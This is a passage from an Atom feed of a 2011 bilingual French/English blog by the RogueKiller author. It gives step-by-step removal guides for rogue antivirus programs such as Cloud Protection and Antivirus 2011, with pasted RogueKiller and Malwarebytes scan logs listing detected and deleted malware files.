&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Windows 5.1.2600 Service Pack 3&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Internet Explorer &lt;/span&gt;&lt;a href="tel:6.0.2900.5512" style="color: #444444;" target="_blank" value="+16029005512"&gt;6.0.2900.5512&lt;/a&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;21/10/2011 07:57:05&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;mbam-log-2011-10-21 (07-57-05).txt&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Type d'examen: Examen complet (C:\|)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) analysé(s): 156378&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Temps écoulé: 3 minute(s), 37 seconde(s)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Processus mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Module(s) mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Clé(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Valeur(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) de données du Registre infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Dossier(s) infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Fichier(s) infecté(s): 4&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Processus mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Module(s) mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Clé(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Valeur(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) de données du Registre infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Dossier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Fichier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\all users\application data\ep02401nmfne02401\&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div id=":42" style="color: #444444;"&gt;
&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;ep02401nmfne02401.exe (Rogue.SecuritySphere) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\Bureau\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;securitysphere.exe (Rogue.SecuritySphere) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\rk_&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;quarantine\ep02401nmfne02401.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;exe.vir (Rogue.SecuritySphere) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;securitysphere[1].vir (Rogue.SecuritySphere) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: x-small;"&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/MeY6VgczvGY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/5828447114179796947/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/10/rogue-security-sphere-2012.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5828447114179796947?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5828447114179796947?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/MeY6VgczvGY/rogue-security-sphere-2012.html" title="[Rogue] Security Sphere 2012" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-j7FvSvWv5e0/TqEKzp9468I/AAAAAAAAAEQ/DZzvw--z6r8/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/10/rogue-security-sphere-2012.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4CQXc5eSp7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-7706004715837872648</id><published>2011-10-15T00:00:00.000-07:00</published><updated>2011-11-05T02:56:00.921-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T02:56:00.921-07:00</app:edited><title>[Rogue] Cloud Protection</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Cloud Protection&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Cloud Protection&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-r0iI6TX79s0/TpkrxV33MYI/AAAAAAAAAEI/--WzBM6s4Tk/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="408" src="http://4.bp.blogspot.com/-r0iI6TX79s0/TpkrxV33MYI/AAAAAAAAAEI/--WzBM6s4Tk/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/dNkJexewjY0/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/dNkJexewjY0?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;


&lt;param name="bgcolor" value="#FFFFFF" /&gt;


&lt;embed width="600" height="375"  src="http://www.youtube.com/v/dNkJexewjY0?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul&gt;
&lt;li&gt;Ce rogue inove un peu en copiant ses fichiers dans le repertoire %system32%. Il intègre aussi souvent un rootkit TDSS -- This rogue uses quite new behaviour, by dropping its files in %sys32%. It often comes with rootkit TDSS.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.3 [14/10/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode normal&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 15/10/2011 08:50:02&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 2&lt;br /&gt;
[RANDOMNAME] UQAX6jQXymZtOrI.exe -- c:\windows\system32\uqax6jqxymztori.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;
[SUSP PATH] svhostu.exe -- c:\documents and settings\tigzy\application data\svhostu.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 3&lt;br /&gt;
[RANDOMNAME] HKLM\[...]\Run : kdvUJwsY0aTNzB8234A (C:\WINDOWS\system32\UQAX6jQXymZtOrI.exe) -&amp;gt; DELETED&lt;br /&gt;
[SUSP PATH] HKLM\[...]\Run : oZ4tgOLrbKev1c0 (C:\Documents and Settings\tigzy\Application Data\svhostu.exe) -&amp;gt; DELETED&lt;br /&gt;
[BLACKLIST] crss.exe : C:\Documents and Settings\tigzy\Menu Démarrer\Programmes\Démarrage\crss.exe -&amp;gt; DELETED&lt;br /&gt;
&lt;br /&gt;
Fichiers / Dossiers particuliers:&lt;br /&gt;
&lt;br /&gt;
Driver: [LOADED] &lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Faire un scan avec &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.zip"&gt;TDSSKiller &lt;/a&gt;et supprimer tous les éléments trouvés -- Do a scan with &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.zip"&gt;TDSSKiller&lt;/a&gt; and delete all found elements&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&amp;nbsp;Malwarebytes' Anti-Malware 1.51.2.1300&lt;br /&gt;
www.malwarebytes.org&lt;br /&gt;
&lt;br /&gt;
Version de la base de données: 7950&lt;br /&gt;
&lt;br /&gt;
Windows 5.1.2600 Service Pack 3&lt;br /&gt;
Internet Explorer 6.0.2900.5512&lt;br /&gt;
&lt;br /&gt;
15/10/2011 08:59:32&lt;br /&gt;
mbam-log-2011-10-15 (08-59-32).txt&lt;br /&gt;
&lt;br /&gt;
Type d'examen: Examen complet (C:\|)&lt;br /&gt;
Elément(s) analysé(s): 158867&lt;br /&gt;
Temps écoulé: 3 minute(s), 50 seconde(s)&lt;br /&gt;
&lt;br /&gt;
Processus mémoire infecté(s): 0&lt;br /&gt;
Module(s) mémoire infecté(s): 0&lt;br /&gt;
Clé(s) du Registre infectée(s): 0&lt;br /&gt;
Valeur(s) du Registre infectée(s): 0&lt;br /&gt;
Elément(s) de données du Registre infecté(s): 0&lt;br /&gt;
Dossier(s) infecté(s): 1&lt;br /&gt;
Fichier(s) infecté(s): 12&lt;br /&gt;
&lt;br /&gt;
Processus mémoire infecté(s):&lt;br /&gt;
(Aucun élément nuisible détecté)&lt;br /&gt;
&lt;br /&gt;
Module(s) mémoire infecté(s):&lt;br /&gt;
(Aucun élément nuisible détecté)&lt;br /&gt;
&lt;br /&gt;
Clé(s) du Registre infectée(s):&lt;br /&gt;
(Aucun élément nuisible détecté)&lt;br /&gt;
&lt;br /&gt;
Valeur(s) du Registre infectée(s):&lt;br /&gt;
(Aucun élément nuisible détecté)&lt;br /&gt;
&lt;br /&gt;
Elément(s) de données du Registre infecté(s):&lt;br /&gt;
(Aucun élément nuisible détecté)&lt;br /&gt;
&lt;br /&gt;
Dossier(s) infecté(s):&lt;br /&gt;
c:\documents and settings\tigzy\menu démarrer\programmes\cloud protection (Rogue.CloudProtection) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
&lt;br /&gt;
Fichier(s) infecté(s):&lt;br /&gt;
c:\documents and settings\tigzy\application data\svhostu.exe (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\rk_quarantine\iaxtg9prboiw6q6.exe.vir (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\rk_quarantine\pledviks6ja5m4n.exe.vir (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\rk_quarantine\svhostu.exe.vir (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\rk_quarantine\uqax6jqxymztori.exe.vir (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\local settings\Temp\svhostu.exe (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\WINDOWS\system32\iaxtg9prboiw6q6.exe (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\WINDOWS\system32\pledviks6ja5m4n.exe (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\WINDOWS\system32\uqax6jqxymztori.exe (Backdoor.Bot) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\menu démarrer\programmes\cloud protection\cloud protection.lnk (Rogue.CloudProtection) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\Bureau\cloud protection.lnk (Rogue.CloudProtection) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
c:\documents and settings\tigzy\application data\ldr.ini (Malware.Trace) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/n9xUBiVQhHU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/7706004715837872648/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/10/rogue-cloud-protection.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7706004715837872648?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7706004715837872648?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/n9xUBiVQhHU/rogue-cloud-protection.html" title="[Rogue] Cloud Protection" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-r0iI6TX79s0/TpkrxV33MYI/AAAAAAAAAEI/--WzBM6s4Tk/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/10/rogue-cloud-protection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUQGQHw7cCp7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-17971380695153891</id><published>2011-08-16T23:15:00.000-07:00</published><updated>2011-11-05T03:02:01.208-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T03:02:01.208-07:00</app:edited><title>[Rogue] Antivirus 2011</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Antivirus 2011&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Antivirus 2011&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="531" src="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/jCFpixOxcKI/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/jCFpixOxcKI?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;


&lt;param name="bgcolor" value="#FFFFFF" /&gt;


&lt;embed width="600" height="375"  src="http://www.youtube.com/v/jCFpixOxcKI?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Ce rogue agit comme un screenlocker et empêche l'accès au bureau.&lt;a href="http://www.commentcamarche.net/faq/5004-windows-demarrage-en-mode-sans-echec"&gt; Il convient de redémarrer en mode sans échec (avec prise en charge reseau)&lt;/a&gt;. -- This rogue acts as a screenlocker. You must reboot under &lt;a href="http://www.bleepingcomputer.com/tutorials/tutorial61.html"&gt;safe mode&lt;/a&gt; (with network support).&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete) &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V5.3.1 [06/08/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode sans echec avec prise en charge reseau&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 17/08/2011 08:00:10&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 0&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 2&lt;br /&gt;
[SUSP PATH] HKCU\[...]\Run : Windows upgrade (C:\Documents and Settings\tigzy\Application Data\AVS\svchost.exe) -&amp;gt; DELETED&lt;br /&gt;
[SUSP PATH] HKLM\[...]\Run : Windows upgrade (C:\Documents and Settings\tigzy\Application Data\AVS\svchost.exe) -&amp;gt; DELETED&lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #444444;"&gt;Malwarebytes' Anti-Malware 1.51.1.1800&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
www.malwarebytes.org&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Version de la base de données: 7484&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Windows 5.1.2600 Service Pack 3&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Internet Explorer 6.0.2900.5512&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
17/08/2011 08:13:13&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
mbam-log-2011-08-17 (08-13-13).txt&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Type d'examen: Examen complet (C:\|)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) analysé(s): 152412&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Temps écoulé: 3 minute(s), 26 seconde(s)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Processus mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Module(s) mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Clé(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Valeur(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
Elément(s) de données du Registre infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
